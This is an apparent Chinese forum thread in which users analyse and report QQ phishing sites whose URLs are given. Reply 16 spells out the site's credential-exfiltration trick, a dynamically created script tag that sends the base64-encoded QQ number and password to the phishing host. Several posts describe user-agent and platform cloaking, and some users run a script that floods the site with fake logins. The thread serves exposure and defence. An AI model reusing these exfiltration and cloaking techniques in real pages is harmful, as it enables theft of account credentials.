首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
工单节点使用指南
• 请用平和的语言准确描述你所遇到的问题
• 厂商的技术支持和你一样也是有喜怒哀乐的普通人类,尊重是相互的
• 如果是关于 V2EX 本身的问题反馈,请使用 反馈 节点
V2EX  ›  全球工单系统

腾讯到现在都不能自动识别出这种低端钓鱼盗号网站么

  •  3
     
  •   HXM · 63 天前 · 5257 次点击
    这是一个创建于 63 天前的主题,其中的信息可能已经有所发展或是发生改变。

    截图: https://i.loli.net/2018/12/22/5c1d0f003b937.png

    链接是: http://sundonggen.com 不要在里面输入帐号密码!!

    破网站连个 https 都没有,输入时弹出的键盘还是 iOS 键盘,让我一个用 Android 的情何以堪

    不管输入什么第一次登录都提示错误

    如果你在 QQ 内置浏览器打开,然后按右上角举报,他会在你按右上角时跳转到腾讯官方的一个页面,这样举报时自动填写的链接地址就是腾讯官方页面地址,就举报不到它

    如果电脑访问,即使用 chrome 开发者工具模拟 iPhone6 或 pixel 2,也会跳转腾讯官方的一个页面

    Whois 查询到域名在阿里云注册,阿里云的举报还居然需要注册登录或者上传身份证明

    腾讯拦截不了,想举报一下做一点微小的工作也不行。

    45 回复  |  直到 2018-12-24 10:13:00 +08:00
        1
    boris1993   63 天前 via Android
    孙冻根.com ???
        2
    v2016   63 天前 via iPhone
    我去研究研究 希望别挂掉
        3
    orangeade   63 天前 via Android
    腾讯只会屏蔽没备案网站
        4
    C2G   63 天前 via Android
    测试真伪很简单 QQ 号输入 10001 如果提示不是正确 QQ 号一定是假的 反之也不一定是真的
        5
    banshicy   63 天前 via Android
    还有这个,查域名也是阿里云注册的,现在人都这么屌了么,, [提示] 不要输入任何信息 http://zhijianjimo.com
        6
    Drumming   63 天前
    没了
        7
    boris1993   63 天前
    @Drumming #6 得用手机,电脑打开自动跳到一个图片上
        8
    mario85   63 天前 via iPhone
    chrome 设置 ua 没
        9
    zyqf   63 天前 via Android   ♥ 19
    我之前写了个脚本,随机生成 QQ 号和密码提交上去。放在几个服务器上跑了两天,提交了大概有一两百万条吧。
        10
    xeaglex   63 天前
    @zyqf 你这就很强了 23333
        11
    zturns   63 天前 via Android   ♥ 1
    腾讯只看钱,备案的网站有时候还没没备案的有用。创宇云天天打电话
        12
    xanthu   63 天前 via Android
    上次碰个 https 的钓鱼网站把身份证和手机信息泄露了,贼气一点办法都没得
        13
    HXM   63 天前 via Android
    @banshicy 感觉像一套源码,弹出的键盘都一模一样

    @mario85 对,应该是做了 UA 判断

    @orangeade 这种网站也居然也敢光明正大的备案。。。

    @xanthu 老哥,https 也不能证明就是官方网站,事关重要账号的网站最好点到安全信息里看看证书详情
        14
    xuecan   63 天前 via iPhone
    那就去举报备案
        15
    galikeoy   63 天前
    @zyqf 哈哈哈哈哈
        16
    AlisaDestiny   63 天前   ♥ 5
    简单分析了一下。这人还挺狡猾的,没有通过常规的 ajax 的方式提交,而是通过 js 动态创建 script 标签,在指定 src 的时候把用户名和密码当做参数附加在后面:sundonggen.com/user.js?token=encodeURIComponent(btoa(JSON.stringify({ u: "你的 QQ",p: "你的密码"}))));然后返回的是正常的 jquery 库代码。
        17
    opengps   63 天前 via Android
    我见过最牛逼的钓鱼网站,自带举报入口,让那些举报的人找不对入口
        18
    580a388da131   63 天前 via iPhone
    做的好精致
        19
    LanFomalhaut   63 天前   ♥ 1
    实际使用中还有腾讯的“任意跳转漏洞”等等在利用: )
    甚至有表现为 QQ 打开后下拉 上方 URL 显示为腾讯的某官方域名
        20
    openbsd   62 天前   ♥ 1
    鹅厂的回复一般是:您的举报证据不足,如果您有了经济损失啥的,请报警,所以说,免费的东西真心有点坑
        21
    winglight2016   62 天前
    这钓鱼网站居然还实现了 iOS 软键盘?很下功夫啊
        22
    agdhole   62 天前 via Android
    我的站主域名和所有子域名全部被腾讯标红了,已备案已实名,去申述说封一个月才解,主站红就算了,首页 502 停用的 API 也被封
        23
    Les1ie   62 天前   ♥ 1
    目前大部分的识别恶意网站不是通过网站内容来识别,而是通过恶意网站列表来识别的,恶意列表是志愿者维护的,维护列表的更新需要时间。
        24
    MineDog   62 天前   ♥ 1
    似乎是通过 navigator.platform 来区别展示不同页面的
        25
    admingyu   62 天前   ♥ 1
    根据 AlisaDestiny 的分析
    抽空简单写了个脚本,提交假的账号密码
    https://github.com/Admingyu/against-fraud/blob/master/qq_fraud_sundonggen.com.py
        26
    yuanshuai1995   62 天前
    @admingyu #25 这个怎么操作的 我也想帮帮忙
        27
    admingyu   62 天前
    @yuanshuai1995 python3.6 环境 文件所在文件夹打开终端直接输入 Python ./qq_fraud_sundonggen.com.py 然后回车就行
        28
    rogwan   62 天前 via iPhone
    这个钓鱼网站不低端了,超过很多人的水平啦😅
        29
    alfchin   62 天前 via Android   ♥ 1
    楼主可以去 12321 举报,顺便去工信部举报阿里云给涉嫌诈骗信息的举报设置不恰当的障碍
        30
    EarthChild   62 天前   ♥ 1
    之前几天有一个 loveprisoner.cn 的钓鱼网站我 whois 之后找注册商发邮件说域名滥用让他们处理了,半天就解决了。其实找域名注册商比较好用,或者报警。其他途径太慢了。
        31
    labnotok   62 天前 via Android
    不是不能,是不想

    钓鱼(诈骗)、色情不是底线,
    Xin Yue 这种才是
        32
    lzyuid   62 天前
    sundonggen.com 企业备案?
    并且分享到群里后,会跳到腾讯微众的活动
        33
    aliipay   62 天前   ♥ 1
    @admingyu 已经顺手跑了几分钟。
    UA 随机来几个是不是更好
        34
    HXM   62 天前 via Android
    @EarthChild 我给阿里云发邮件了,他自动回复让我到举报页面举报,举报页面需要登录。。。
        35
    klii   62 天前
    https://qzonestyle.gtimg.cn/aoi/sola/20180612182915_oC2G8CAcEv.jpg

    我点了后跳转了这个,话说他是如何使用的微信的 ssl
        36
    ochatokori   62 天前 via Android
    这键盘是用来搞笑的吧
        37
    mytsing520   62 天前
    QQ 邮箱曾经实现过智能识别,用于腾讯安全的大数据,现在也在用。

    但问题是,要识别这些内容是否是安全的内容,他就要到这个 URL 上去模拟访问一次,万一遇到了只允许点击一次的链接,如激活账号这种,当然点击后直接激活的没关系,万一点击后还要填写信息的,用户就要骂娘了。

    所以你很多情况下会看到腾讯的服务器访问了你网站上部分页面的记录。多分析下 refer,就能发现。
        38
    leaves7i   62 天前 via Android
    “论安卓设备使用 iPhone UA 的必要性”
        39
    rogwan   62 天前 via iPhone
    @mytsing520 这种情况很容易造成恶意注册。我有短号邮箱地址,收到恶意注册第三方 APP 的邮件,自己没理睬,但是被激活啦。然后就一直各种垃圾推送
        40
    looseChen   62 天前
    钓鱼钓过去了也没啥用把,现在不是一般 qq 都有设备锁嘛
        41
    EarthChild   62 天前
    @HXM #34 那不行就去 icann 投诉阿里不负责任
        42
    yuanshuai1995   61 天前
    网站已经挂掉了吧
        43
    si   61 天前
    腾讯的举报大部分时候都是没有用的,那些发图片格式的违法的广告,举报都是不成功的。
        44
    scientist   61 天前   ♥ 1
    举报了个带钓鱼网站二维码的群发图片,腾讯判定举报不成功。
        45
    admingyu   61 天前
    @scientist 发兼职广告的举报之后发邮件告诉我那个人确认存在违规行为已被封号,过两天那个人还是能给我发广告,一样的
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2213 人在线   最高记录 4385   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 19ms · UTC 02:46 · PVG 10:46 · LAX 18:46 · JFK 21:46
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1